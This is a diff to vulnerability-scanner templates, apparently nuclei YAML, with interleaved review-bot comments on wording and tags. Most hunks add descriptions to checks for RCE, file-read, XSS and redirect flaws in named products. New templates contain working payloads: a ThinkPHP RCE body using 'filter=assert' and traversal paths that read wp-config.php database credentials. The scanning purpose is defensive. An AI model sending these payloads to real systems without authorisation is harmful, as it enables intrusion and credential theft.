|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
|
|
|
@ -4,6 +4,7 @@ info:
|
||||||
author: pikpikcu
|
author: pikpikcu
|
||||||
severity: high
|
severity: high
|
||||||
reference: https://paper.seebug.org/676/
|
reference: https://paper.seebug.org/676/
|
||||||
|
description: A vulnerability in MetInfo allows remote unauthenticated attackers access to locally stored files and their content.
|
||||||
tags: metinfo,lfi
|
tags: metinfo,lfi
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
|
|
|
@ -4,6 +4,7 @@ info:
|
||||||
name: OpenSNS Remote Code Execution Vulnerability
|
name: OpenSNS Remote Code Execution Vulnerability
|
||||||
author: gy741
|
author: gy741
|
||||||
severity: critical
|
severity: critical
|
||||||
|
description: A vulnerability in OpenSNS allows remote unauthenticated attackers to cause the product to execute arbitrary code via the 'shareBox' endpoint.
|
||||||
reference:
|
reference:
|
||||||
- http://www.0dayhack.net/index.php/2417/
|
- http://www.0dayhack.net/index.php/2417/
|
||||||
- https://www.pwnwiki.org/index.php?title=OpenSNS_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E
|
- https://www.pwnwiki.org/index.php?title=OpenSNS_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E
|
||||||
|
|
|
@ -3,6 +3,7 @@ id: php-zerodium-backdoor-rce
|
||||||
info:
|
info:
|
||||||
name: PHP Zerodium Backdoor RCE
|
name: PHP Zerodium Backdoor RCE
|
||||||
author: dhiyaneshDk
|
author: dhiyaneshDk
|
||||||
|
description: A backdoor has been introduced into PHP, dubbed 'zerodiumvar_dump', the backdoor allowed the execution of arbitrary PHP code.
|
||||||
reference: https://news-web.php.net/php.internals/113838
|
reference: https://news-web.php.net/php.internals/113838
|
||||||
severity: critical
|
severity: critical
|
||||||
tags: php,backdoor
|
tags: php,backdoor
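Review bot: The new description is a comma splice and, as I recall the referenced php.internals thread, overstates scope: "introduced into PHP" reads as if a released PHP version shipped the backdoor, whereas the incident concerned a commit to the PHP source repository. Suggest `description: A backdoor dubbed 'zerodiumvar_dump' was committed to the PHP source repository; builds containing it allow execution of arbitrary PHP code.`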
|
||||||
|
|
|
@ -4,6 +4,7 @@ info:
|
||||||
name: ProcessMaker <= 3.5.4 Directory Traversal
|
name: ProcessMaker <= 3.5.4 Directory Traversal
|
||||||
author: KrE80r
|
author: KrE80r
|
||||||
severity: high
|
severity: high
|
||||||
|
description: A vulnerability in ProcessMaker allows remote attackers to access arbitrary files and disclose their content.
|
||||||
reference:
|
reference:
|
||||||
- https://www.exploit-db.com/exploits/50229
|
- https://www.exploit-db.com/exploits/50229
|
||||||
- https://www.processmaker.com
|
- https://www.processmaker.com
|
||||||
|
|
|
@ -5,6 +5,7 @@ info:
|
||||||
author: dwisiswant0
|
author: dwisiswant0
|
||||||
severity: high
|
severity: high
|
||||||
tags: rconfig,rce
|
tags: rconfig,rce
|
||||||
|
description: A vulnerability in rConfig allows remote attackers to execute arbitrary code on the remote installation by accessing the 'userprocess.php' endpoint.
|
||||||
reference:
|
reference:
|
||||||
- https://www.rconfig.com/downloads/rconfig-3.9.5.zip
|
- https://www.rconfig.com/downloads/rconfig-3.9.5.zip
|
||||||
- https://www.exploit-db.com/exploits/48878
|
- https://www.exploit-db.com/exploits/48878
|
||||||
|
|
|
@ -4,6 +4,7 @@ info:
|
||||||
name: RockMongo V1.1.8 XSS
|
name: RockMongo V1.1.8 XSS
|
||||||
author: pikpikcu
|
author: pikpikcu
|
||||||
severity: medium
|
severity: medium
|
||||||
|
description: A vulnerability in RockMongo allows attackers to inject arbitrary javascript into the response returned by the application.
|
||||||
reference: https://packetstormsecurity.com/files/136658/RockMongo-1.1.8-Cross-Site-Request-Forgery-Cross-Site-Scripting.html
|
reference: https://packetstormsecurity.com/files/136658/RockMongo-1.1.8-Cross-Site-Request-Forgery-Cross-Site-Scripting.html
|
||||||
tags: rockmongo,xss
|
tags: rockmongo,xss
|
||||||
|
|
||||||
|
|
|
@ -4,8 +4,9 @@ info:
|
||||||
name: Ruijie EG cli.php RCE
|
name: Ruijie EG cli.php RCE
|
||||||
author: pikpikcu
|
author: pikpikcu
|
||||||
severity: critical
|
severity: critical
|
||||||
|
description: A vulnerability in Ruikie EG's cli.php end point allows remote unauthenticated attackers to gain 'admin' privileges. The vulnerability is exploitable because an unauthenticated user can gain 'admin' privileges due to a vulnerability in the login screen.
|
||||||
reference:
|
reference:
|
||||||
- http://wiki.peiqi.tech/PeiQi_Wiki/%E7%BD%91%E7%BB%9C%E8%AE%BE%E5%A4%87%E6%BC%8F%E6%B4%9E/%E9%94%90%E6%8D%B7/%E9%94%90%E6%8D%B7EG%E6%98%93%E7%BD%91%E5%85%B3%20cli.php%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.html
|
- https://github.com/PeiQi0/PeiQi-WIKI-POC/blob/PeiQi/PeiQi_Wiki/%E7%BD%91%E7%BB%9C%E8%AE%BE%E5%A4%87%E6%BC%8F%E6%B4%9E/%E9%94%90%E6%8D%B7/%E9%94%90%E6%8D%B7EG%E6%98%93%E7%BD%91%E5%85%B3%20cli.php%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.md
|
||||||
- https://www.ruijienetworks.com
|
- https://www.ruijienetworks.com
|
||||||
tags: ruijie,rce
|
tags: ruijie,rce
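Review bot: "Ruikie" in the new description misspells the vendor that `name` and `tags` spell Ruijie, and the two sentences say the same thing twice without mentioning the command execution that the name `Ruijie EG cli.php RCE` and the `rce` tag claim. Suggest `description: A vulnerability in the Ruijie EG gateway's cli.php endpoint allows remote unauthenticated attackers to obtain 'admin' privileges through the login screen and execute arbitrary commands.`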
|
||||||
|
|
||||||
|
|
|
@ -4,6 +4,7 @@ info:
|
||||||
name: Ruijie Networks Switch eWeb S29_RGOS 11.4 LFI
|
name: Ruijie Networks Switch eWeb S29_RGOS 11.4 LFI
|
||||||
author: pikpikcu
|
author: pikpikcu
|
||||||
severity: high
|
severity: high
|
||||||
|
description: A vulnerability in Ruijie Networks Switch allows remote unauthenticated attackers to access locally stored files and retrieve their content via the 'download.do' endpoint.
|
||||||
reference: https://exploit-db.com/exploits/48755
|
reference: https://exploit-db.com/exploits/48755
|
||||||
tags: ruijie,lfi
|
tags: ruijie,lfi
|
||||||
|
|
||||||
|
|
|
@ -4,6 +4,7 @@ info:
|
||||||
name: Sangfor EDR 3.2.17R1/3.2.21 RCE
|
name: Sangfor EDR 3.2.17R1/3.2.21 RCE
|
||||||
author: pikpikcu
|
author: pikpikcu
|
||||||
severity: critical
|
severity: critical
|
||||||
|
description: A vulnerability in Sangfor EDR product allows remote unauthenticated users to cause the product to execute arbitrary commands.
|
||||||
reference: https://www.cnblogs.com/0day-li/p/13650452.html
|
reference: https://www.cnblogs.com/0day-li/p/13650452.html
|
||||||
tags: rce
|
tags: rce
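Review bot: `tags: rce` carries no vendor or product tag, while the sibling templates updated in this commit tag both (`ruijie,rce`, `seacms,rce`, `yapi,rce`), so this template cannot be selected by product. Suggest `tags: sangfor,edr,rce`.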
|
||||||
|
|
||||||
|
|
|
@ -4,6 +4,7 @@ info:
|
||||||
name: SAP wide open redirect
|
name: SAP wide open redirect
|
||||||
author: Gal Nagli
|
author: Gal Nagli
|
||||||
severity: medium
|
severity: medium
|
||||||
|
description: A vulnerability in SAP's 'logoff' endpoint allows attackers to redirect victims to their URL of choice.
|
||||||
tags: redirect,sap
|
tags: redirect,sap
|
||||||
|
|
||||||
|
|
||||||
|
|
|
@ -3,6 +3,7 @@ info:
|
||||||
name: SeaCMS V6.4.5 RCE
|
name: SeaCMS V6.4.5 RCE
|
||||||
author: pikpikcu
|
author: pikpikcu
|
||||||
severity: high
|
severity: high
|
||||||
|
description: A vulnerability in SeaCMS allows remote unauthenticated attackers to execute arbitrary PHP code.
|
||||||
reference: https://mengsec.com/2018/08/06/SeaCMS-v6-45前台代码执行漏洞分析/
|
reference: https://mengsec.com/2018/08/06/SeaCMS-v6-45前台代码执行漏洞分析/
|
||||||
tags: seacms,rce
|
tags: seacms,rce
|
||||||
|
|
||||||
|
|
|
@ -4,7 +4,7 @@ info:
|
||||||
name: Solar-Log 500 2.8.2 - Incorrect Access Control
|
name: Solar-Log 500 2.8.2 - Incorrect Access Control
|
||||||
author: geeknik
|
author: geeknik
|
||||||
severity: high
|
severity: high
|
||||||
description: The web administration server for Solar-Log 500 all versions prior to 2.8.2 Build 52 does not require authentication, which allows arbitrary remote attackers>
|
description: The web administration server for Solar-Log 500 all versions prior to 2.8.2 Build 52 does not require authentication, which allows arbitrary remote attackers gain administrative privileges by connecting to the server
|
||||||
reference: https://www.exploit-db.com/exploits/49986
|
reference: https://www.exploit-db.com/exploits/49986
|
||||||
tags: solarlog,auth-bypass
|
tags: solarlog,auth-bypass
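Review bot: The rewritten description repairs the truncated line but still reads "allows arbitrary remote attackers gain administrative privileges" and has no terminal period. Suggest `description: The web administration server for Solar-Log 500 all versions prior to 2.8.2 Build 52 does not require authentication, which allows arbitrary remote attackers to gain administrative privileges by connecting to the server.`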
|
||||||
|
|
||||||
|
|
|
@ -4,6 +4,7 @@ info:
|
||||||
name: Sonicwall SSLVPN ShellShock RCE
|
name: Sonicwall SSLVPN ShellShock RCE
|
||||||
author: PR3R00T
|
author: PR3R00T
|
||||||
severity: critical
|
severity: critical
|
||||||
|
description: A vulnerability in Sonicwall SSLVPN contains a 'ShellShock' vulnerability which allows remote unauthenticated attackers to execute arbitrary commands.
|
||||||
reference:
|
reference:
|
||||||
- https://twitter.com/chybeta/status/1353974652540882944
|
- https://twitter.com/chybeta/status/1353974652540882944
|
||||||
- https://darrenmartyn.ie/2021/01/24/visualdoor-sonicwall-ssl-vpn-exploit/
|
- https://darrenmartyn.ie/2021/01/24/visualdoor-sonicwall-ssl-vpn-exploit/
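Review bot: "A vulnerability in Sonicwall SSLVPN contains a 'ShellShock' vulnerability" is circular. Suggest `description: The Sonicwall SSLVPN web interface is affected by the Bash 'ShellShock' vulnerability, which allows remote unauthenticated attackers to execute arbitrary commands.`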
|
||||||
|
|
|
@ -4,6 +4,7 @@ info:
|
||||||
name: TurboCRM XSS
|
name: TurboCRM XSS
|
||||||
author: pikpikcu
|
author: pikpikcu
|
||||||
severity: medium
|
severity: medium
|
||||||
|
description: A vulnerability in TurboCRM allows remote attackers to inject arbitrary Javascript into the response returned by the application.
|
||||||
reference: https://gist.github.com/pikpikcu/9689c5220abbe04d4927ffa660241b4a
|
reference: https://gist.github.com/pikpikcu/9689c5220abbe04d4927ffa660241b4a
|
||||||
tags: xss,turbocrm
|
tags: xss,turbocrm
|
||||||
|
|
||||||
|
|
|
@ -4,6 +4,7 @@ info:
|
||||||
name: Twig PHP <2.4.4 template engine - SSTI
|
name: Twig PHP <2.4.4 template engine - SSTI
|
||||||
author: madrobot
|
author: madrobot
|
||||||
severity: high
|
severity: high
|
||||||
|
description: A vulnerability in Twig PHP allows remote attackers to cause the product to execute arbitrary commands via an SSTI vulnerability.
|
||||||
tags: php,ssti
|
tags: php,ssti
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
|
|
|
@ -3,6 +3,7 @@ info:
|
||||||
name: UEditor Arbitrary File Upload
|
name: UEditor Arbitrary File Upload
|
||||||
author: princechaddha
|
author: princechaddha
|
||||||
severity: high
|
severity: high
|
||||||
|
description: A vulnerability in UEditor allows remote unauthenticated attackers to upload arbitrary files to the server, this in turn can be used to make the application to execute their content as code.
|
||||||
reference:
|
reference:
|
||||||
- https://zhuanlan.zhihu.com/p/85265552
|
- https://zhuanlan.zhihu.com/p/85265552
|
||||||
- https://www.freebuf.com/vuls/181814.html
|
- https://www.freebuf.com/vuls/181814.html
|
||||||
|
|
|
@ -3,6 +3,7 @@ info:
|
||||||
name: Unauthenticated Hoteldruid Panel
|
name: Unauthenticated Hoteldruid Panel
|
||||||
author: princechaddha
|
author: princechaddha
|
||||||
severity: high
|
severity: high
|
||||||
|
description: A vulnerability in Hoteldruid Panel allows remote unauthenticated users access to the management portal without authentication.
|
||||||
reference: https://www.hoteldruid.com/
|
reference: https://www.hoteldruid.com/
|
||||||
tags: hoteldruid,panel,unauth
|
tags: hoteldruid,panel,unauth
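Review bot: The new description says "unauthenticated users access to the management portal without authentication", stating the same thing twice. Suggest `description: The Hoteldruid management portal is reachable without authentication, exposing its functionality to remote unauthenticated users.`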
|
||||||
|
|
||||||
|
|
|
@ -3,6 +3,7 @@ info:
|
||||||
name: Unauthenticated Spark REST API
|
name: Unauthenticated Spark REST API
|
||||||
author: princechaddha
|
author: princechaddha
|
||||||
severity: medium
|
severity: medium
|
||||||
|
description: The remote Spark product's REST API interface does not appear to prevent unauthenticated users from accesing it.
|
||||||
reference: https://xz.aliyun.com/t/2490
|
reference: https://xz.aliyun.com/t/2490
|
||||||
tags: spark,unauth
|
tags: spark,unauth
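Review bot: The new description misspells "accesing"; suggest `description: The remote Spark REST API does not appear to prevent unauthenticated users from accessing it.`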
|
||||||
|
|
||||||
|
|
|
@ -4,6 +4,7 @@ info:
|
||||||
name: viewLinc viewLinc/5.1.2.367 (and sometimes 5.1.1.50) is vulnerable to CRLF Injection.
|
name: viewLinc viewLinc/5.1.2.367 (and sometimes 5.1.1.50) is vulnerable to CRLF Injection.
|
||||||
author: geeknik
|
author: geeknik
|
||||||
severity: low
|
severity: low
|
||||||
|
description: The viewLinc application allows remote attackers to inject a CRLF character into the responses returned by the product, this allows attackers to inject arbitrary HTTP headers into the response returned.
|
||||||
reference: https://www.vaisala.com/en/products/systems/indoor-monitoring-systems/viewlinc-continuous-monitoring-system
|
reference: https://www.vaisala.com/en/products/systems/indoor-monitoring-systems/viewlinc-continuous-monitoring-system
|
||||||
tags: crlf,viewlinc
|
tags: crlf,viewlinc
|
||||||
|
|
||||||
|
|
|
@ -4,6 +4,7 @@ info:
|
||||||
name: Vehicle Parking Management System 1.0 - Authentication Bypass
|
name: Vehicle Parking Management System 1.0 - Authentication Bypass
|
||||||
author: dwisiswant0
|
author: dwisiswant0
|
||||||
severity: high
|
severity: high
|
||||||
|
description: The Vehicle Parking Management System allows remote attackers to bypass the authentication system by utilizing an SQL injection vulnerability in the 'password' parameter.
|
||||||
reference: https://www.exploit-db.com/exploits/48877
|
reference: https://www.exploit-db.com/exploits/48877
|
||||||
tags: auth-bypass
|
tags: auth-bypass
|
||||||
requests:
|
requests:
|
||||||
|
|
|
@ -3,6 +3,7 @@ info:
|
||||||
name: WebUI 1.5b6 RCE
|
name: WebUI 1.5b6 RCE
|
||||||
author: pikpikcu
|
author: pikpikcu
|
||||||
severity: critical
|
severity: critical
|
||||||
|
description: WebUI's 'mainfile.php' endpoint contain a vulnerability that allows remote attackers to cause it to execute arbitrary code via the 'Logon' parameter.
|
||||||
reference: https://www.exploit-db.com/exploits/36821
|
reference: https://www.exploit-db.com/exploits/36821
|
||||||
tags: webui,rce
|
tags: webui,rce
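Review bot: Subject-verb agreement in the new description: "endpoint contain a vulnerability". Suggest `description: WebUI's 'mainfile.php' endpoint contains a vulnerability that allows remote attackers to execute arbitrary code via the 'Logon' parameter.`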
|
||||||
|
|
||||||
|
|
|
@ -5,7 +5,7 @@ info:
|
||||||
author: pikpikcu
|
author: pikpikcu
|
||||||
severity: medium
|
severity: medium
|
||||||
tags: xss
|
tags: xss
|
||||||
|
description: A vulnerability in WEMS Enterprise Manager allows remote attackers to inject arbitrary Javascript into the response return by the server by sending it to the '/guest/users/forgotten' endpoint and the 'email' parameter.
|
||||||
reference:
|
reference:
|
||||||
- https://packetstormsecurity.com/files/155777/WEMS-Enterprise-Manager-2.58-Cross-Site-Scripting.html
|
- https://packetstormsecurity.com/files/155777/WEMS-Enterprise-Manager-2.58-Cross-Site-Scripting.html
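Review bot: The new description reads "the response return by the server" and "sending it to the ... endpoint" without saying what "it" is. Suggest `description: A vulnerability in WEMS Enterprise Manager allows remote attackers to inject arbitrary Javascript into the response returned by the server via the 'email' parameter of the '/guest/users/forgotten' endpoint.`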
|
||||||
|
|
||||||
|
|
|
@ -5,6 +5,7 @@ info:
|
||||||
author: pikpikcu
|
author: pikpikcu
|
||||||
severity: critical
|
severity: critical
|
||||||
tags: yapi,rce
|
tags: yapi,rce
|
||||||
|
description: A vulnerability in Yapi allows remote unauthenticated attackers to cause the product to execute arbitrary code.
|
||||||
reference:
|
reference:
|
||||||
- https://www.secpulse.com/archives/162502.html
|
- https://www.secpulse.com/archives/162502.html
|
||||||
- https://gist.github.com/pikpikcu/0145fb71203c8a3ad5c67b8aab47165b
|
- https://gist.github.com/pikpikcu/0145fb71203c8a3ad5c67b8aab47165b
|
||||||
|
|
|
@ -5,6 +5,7 @@ info:
|
||||||
author: pdteam
|
author: pdteam
|
||||||
severity: low
|
severity: low
|
||||||
tags: apache,rce
|
tags: apache,rce
|
||||||
|
description: A vulnerability in Apache Yarn ResourceManager allows remote unauthenticated users to cause the product to execute arbitrary code.
|
||||||
reference: https://neerajsabharwal.medium.com/hadoop-yarn-hack-9a72cc1328b6
|
reference: https://neerajsabharwal.medium.com/hadoop-yarn-hack-9a72cc1328b6
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
|
|
|
@ -1,9 +1,10 @@
|
||||||
id: zhiyuan-file-upload
|
id: zhiyuan-file-upload
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Zhiyuan Oa arbitrary file upload vulnerability
|
name: Zhiyuan OA arbitrary file upload vulnerability
|
||||||
author: gy741
|
author: gy741
|
||||||
severity: critical
|
severity: critical
|
||||||
|
description: A vulnerability in Zhiyuan OA allows remote unauthenticated attackers to upload arbitrary files to the remote server which they can later access and cause their code to be executed.
|
||||||
reference: https://www.programmersought.com/article/92658169875/
|
reference: https://www.programmersought.com/article/92658169875/
|
||||||
tags: zhiyuan,rce
|
tags: zhiyuan,rce
|
||||||
|
|
||||||
|
|
|
@ -1,9 +1,10 @@
|
||||||
id: zhiyuan-oa-session-leak
|
id: zhiyuan-oa-session-leak
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Zhiyuan Oa Session Leak
|
name: Zhiyuan OA Session Leak
|
||||||
author: pikpikcu
|
author: pikpikcu
|
||||||
severity: medium
|
severity: medium
|
||||||
|
description: A vulnerability in Zhiyuan OA allows remote unauthenticated users access to sensitive session information via the 'getSessionList.jsp' endpoint.
|
||||||
reference: https://www.zhihuifly.com/t/topic/3345
|
reference: https://www.zhihuifly.com/t/topic/3345
|
||||||
tags: zhiyuan,leak,disclosure
|
tags: zhiyuan,leak,disclosure
|
||||||
|
|
||||||
|
|
|
@ -4,6 +4,7 @@ info:
|
||||||
name: Zimbra Collaboration Suite (ZCS) - SSRF
|
name: Zimbra Collaboration Suite (ZCS) - SSRF
|
||||||
author: gy741
|
author: gy741
|
||||||
severity: critical
|
severity: critical
|
||||||
|
description: A vulnerability in Zimbra Collaboration Suite allows remote unauthenticated attackers to cause the product to include content returned by third-party servers and use it as its own code.
|
||||||
reference:
|
reference:
|
||||||
- https://www.adminxe.com/2183.html
|
- https://www.adminxe.com/2183.html
|
||||||
tags: zimbra,ssrf,oast
|
tags: zimbra,ssrf,oast
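Review bot: The new description says the product is made to "include content returned by third-party servers and use it as its own code", which describes remote code inclusion rather than the SSRF that `name` and the `ssrf,oast` tags declare. Suggest `description: A vulnerability in Zimbra Collaboration Suite allows remote unauthenticated attackers to make the server issue requests to attacker-supplied URLs (SSRF).`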
|
||||||
|
|
|
@ -4,6 +4,7 @@ info:
|
||||||
name: Zoo Management System 1.0 - Authentication Bypass
|
name: Zoo Management System 1.0 - Authentication Bypass
|
||||||
author: dwisiswant0
|
author: dwisiswant0
|
||||||
severity: high
|
severity: high
|
||||||
|
description: A vulnerability in Zoo Management allows remote attackers to bypass the authentication mechanism via an SQL injection vulnerability.
|
||||||
reference: https://www.exploit-db.com/exploits/48880
|
reference: https://www.exploit-db.com/exploits/48880
|
||||||
tags: auth-bypass,zms
|
tags: auth-bypass,zms
|
||||||
|
|
||||||
|
|
|
@ -0,0 +1,27 @@
|
||||||
|
id: thinkphp-501-rce
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: ThinkPHP 5.0.1 RCE
|
||||||
|
author: lark-lab
|
||||||
|
severity: critical
|
||||||
|
tags: thinkphp,rce
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: POST
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/?s=index/index/index"
|
||||||
|
body: "s=phpinfo()&_method=__construct&filter=assert"
|
||||||
|
headers:
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "PHP Extension"
|
||||||
|
- "PHP Version"
|
||||||
|
condition: and
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -4,6 +4,7 @@ info:
|
||||||
name: SMTP WP Plugin Directory listing enabled
|
name: SMTP WP Plugin Directory listing enabled
|
||||||
author: PR3R00T
|
author: PR3R00T
|
||||||
severity: high
|
severity: high
|
||||||
|
description: The WordPress Easy WP SMTP Plugin has its 'easy-wp-smtp' folder remotely acccessible and its content available for access.
|
||||||
reference: https://blog.nintechnet.com/wordpress-easy-wp-smtp-plugin-fixed-zero-day-vulnerability/
|
reference: https://blog.nintechnet.com/wordpress-easy-wp-smtp-plugin-fixed-zero-day-vulnerability/
|
||||||
tags: wordpress,wp-plugin
|
tags: wordpress,wp-plugin
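Review bot: The new description misspells "acccessible". Suggest `description: The WordPress Easy WP SMTP plugin has its 'easy-wp-smtp' folder remotely accessible and its content available for listing.`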
|
||||||
|
|
||||||
|
|
|
@ -4,6 +4,7 @@ info:
|
||||||
name: WordPress Attitude Themes 1.1.1 Open Redirection
|
name: WordPress Attitude Themes 1.1.1 Open Redirection
|
||||||
author: 0x_Akoko
|
author: 0x_Akoko
|
||||||
severity: low
|
severity: low
|
||||||
|
description: The WordPress Attitude Themes allows remote attackers to redirect users to an attacker controlled URL.
|
||||||
reference: https://cxsecurity.com/issue/WLB-2020030183
|
reference: https://cxsecurity.com/issue/WLB-2020030183
|
||||||
tags: wordpress,wp-theme,redirect
|
tags: wordpress,wp-theme,redirect
|
||||||
|
|
||||||
|
|
|
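--- a/PATH_NOT_SHOWN
+++ b/PATH_NOT_SHOWN
@@ -4,6 +4,7 @@ info:
   name: WordPress Weekender Newspaper Themes 9.0 - Open Redirection
   author: 0x_Akoko
   severity: low
+  description: The WordPress Weekender Newspaper Themes allows remote attackers to redirect users to an attacker controlled URL.
   reference: https://cxsecurity.com/issue/WLB-2020040103
   tags: wordpress,wp-plugin,redirect
 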
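Review bot: The `tags` line still carries `wp-plugin`, while both the `name` and the newly added description describe a theme. That line is context rather than part of this change, so it may be deliberate, but `tags: wordpress,wp-theme,redirect` would match the Attitude Themes template in the previous hunk and keep theme-based filtering accurate.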
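--- a/PATH_NOT_SHOWN
+++ b/PATH_NOT_SHOWN
@@ -3,6 +3,7 @@ info:
   name: WordPress accessible wp-config
   author: Kiblyn11,zomsop82,madrobot,geeknik,daffainfo,r12w4n
   severity: high
+  description: The remote WordPress installation has the `wp-config` file remotely accessible and its content available for reading.
   tags: wordpress,backup
 
 requests: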
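--- /dev/null
+++ b/PATH_NOT_SHOWN
@@ -0,0 +1,29 @@
+id: wp-javospot-lfi
+
+info:
+  name: Javo Spot Premium Theme - Unauthenticated Directory Traversal
+  author: 0x_Akoko
+  severity: high
+  reference:
+    - https://codeseekah.com/2017/02/09/javo-themes-spot-lfi-vulnerability/
+    - https://wpscan.com/vulnerability/2d465fc4-d4fa-43bb-9c0d-71dcc3ee4eab
+    - https://themeforest.net/item/javo-spot-multi-purpose-directory-wordpress-theme/13198068
+  tags: wordpress,wp-theme,lfi,wp
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/wp-admin/admin-ajax.php?jvfrm_spot_get_json&fn=../../wp-config.php&callback=jQuery'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "DB_NAME"
+          - "DB_PASSWORD"
+        condition: and
+
+      - type: status
+        status:
+          - 200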
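Review bot: The new template has no `description`, unlike the other new WordPress LFI template (wp-tinymce-lfi) added in this commit, and its `tags` line carries `wp` next to `wordpress`, which is redundant. Add a one-line description stating that the theme's admin-ajax handler reads the file named by the `fn` parameter without authentication, and trim the tag line to `tags: wordpress,wp-theme,lfi`.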
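--- a/PATH_NOT_SHOWN
+++ b/PATH_NOT_SHOWN
@@ -4,6 +4,7 @@ info:
   name: WordPress Oxygen-Theme Themes LFI
   author: 0x_Akoko
   severity: high
+  description: The WordPress Oxygen-Theme has a local file inclusion vulnerability in its 'download.php' and 'file' parameter.
   tags: wordpress,wp-theme,lfi
   reference: https://cxsecurity.com/issue/WLB-2019030178
 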
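Review bot: The added description reads "in its 'download.php' and 'file' parameter", which presents 'download.php' as a parameter rather than the script that takes it; clearer is `description: The WordPress Oxygen-Theme has a local file inclusion vulnerability in the 'file' parameter of its 'download.php' script.` The request block is outside the hunk, so this reading is taken from the description's own wording.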
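--- /dev/null
+++ b/PATH_NOT_SHOWN
@@ -0,0 +1,29 @@
+id: wp-tinymce-lfi
+
+info:
+  name: Tinymce Thumbnail Gallery <= 1.0.7 - download-image.php LFI
+  author: 0x_Akoko
+  severity: high
+  description: The Tinymce Thumbnail Gallery WordPress plugin was affected by a download-image.php Local File Inclusion security vulnerability.
+  reference:
+    - https://wpscan.com/vulnerability/4a49b023-c1c9-4cc4-a2fd-af5f911bb400
+    - http://wordpress.org/extend/plugins/tinymce-thumbnail-gallery/
+  tags: wordpress,wp-theme,lfi,wordpress,tinymce
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/wp-content/plugins/tinymce-thumbnail-gallery/php/download-image.php?href=../../../../wp-config.php'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "DB_NAME"
+          - "DB_PASSWORD"
+        condition: and
+
+      - type: status
+        status:
+          - 200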
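Review bot: The `tags` line lists `wordpress` twice and tags the template `wp-theme`, although the description calls Tinymce Thumbnail Gallery a plugin and the request path sits under `/wp-content/plugins/`; use `tags: wordpress,wp-plugin,lfi,tinymce`. The description's "was affected by" also suggests the issue is historical; "is affected by" matches the present-tense descriptions elsewhere in this commit.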
@ -4,7 +4,7 @@ info:
name: wordpress-upload-data
name: wordpress-upload-data
author: pussycat0x
author: pussycat0x
severity: medium
severity: medium
description: Searches for Passwords in the wordpress uploads directory.
description: The remote WordPress installation contains a file 'data.txt' under the '/wp-content/uploads/' folder that has sensitive information inside it.
reference: https://www.exploit-db.com/ghdb/7040
reference: https://www.exploit-db.com/ghdb/7040
tags: wordpress,listing
tags: wordpress,listing
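Review bot: The new description names a 'data.txt' file under '/wp-content/uploads/', but the template's request `path` is outside this hunk, so whether the two agree cannot be checked here — please confirm the path matches. The unchanged `tags` line keeps `listing`, which reads as a directory-listing check, whereas the new description describes exposure of a specific sensitive file; if the template fetches the file itself, the tag may no longer describe what it does.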
@ -4,7 +4,7 @@ info:
name: Woocommerce PDF Invoice Exposure
name: Woocommerce PDF Invoice Exposure
author: mohammedsaneem,sec_hawk
author: mohammedsaneem,sec_hawk
severity: medium
severity: medium
description: Allows attacker to view sensitive information such as company invoices
description: A vulnerability in Woocommerce allows remote unauthenticated attackers to access company invoices and other sensitive information.
reference:
reference:
- https://twitter.com/sec_hawk/status/1426984595094913025?s=21
- https://twitter.com/sec_hawk/status/1426984595094913025?s=21
- https://github.com/Mohammedsaneem/wordpress-upload-information-disclosure/blob/main/worpress-upload.yaml
- https://github.com/Mohammedsaneem/wordpress-upload-information-disclosure/blob/main/worpress-upload.yaml
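Review bot: The new description attributes the issue to "Woocommerce" as a whole, while the `name` scopes it to the PDF Invoice feature, so a reader of the description alone would take WooCommerce core to be affected. Since the request block is outside the hunk, the exact component cannot be confirmed here, but wording along the lines of `description: The WooCommerce PDF Invoice integration exposes company invoices and other sensitive information to remote unauthenticated attackers.` keeps the description consistent with the name.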
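--- a/PATH_NOT_SHOWN
+++ b/PATH_NOT_SHOWN
@@ -4,6 +4,14 @@ info:
   name: WPTouch Switch Desktop 3.x Open Redirection
   author: 0x_Akoko
   severity: medium
+  description: |
+    WordPress WPTouch Switch Desktop 3.x accepts a user-controlled input that specifies a link to an external site, and uses that link in a Redirect. This simplifies phishing attacks.
+
+    An HTTPparameter may contain a URL value and could cause the web application to redirect the request to the specified URL. By modifying the URL value to a malicious site, an attacker may successfully launch a phishing scam and steal user credentials. Because the server name in the modified link is identical to the original site, phishing attempts have a more trustworthy appearance.
+
+    Open redirect is a failure in that process that makes it possible for attackers to steer users to malicious websites. This vulnerability is used in phishing attacks to get users to visit malicious sites without realizing it. Web users often encounter redirection when they visit the Web site of a company whose name has been changed or which has been acquired by another company. Visiting unreal web page user's computer becomes affected by malware the task of which is to deceive the valid actor and steal his personal data.
+
+    The WPtouch plugin for WordPress is prone to a URI-redirection vulnerability because the application fails to properly sanitize user-supplied input. A successful exploit may aid in phishing attacks; other attacks are possible.
   reference: https://cxsecurity.com/issue/WLB-2020030114
   tags: wp-plugin,redirect,wordpress
 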
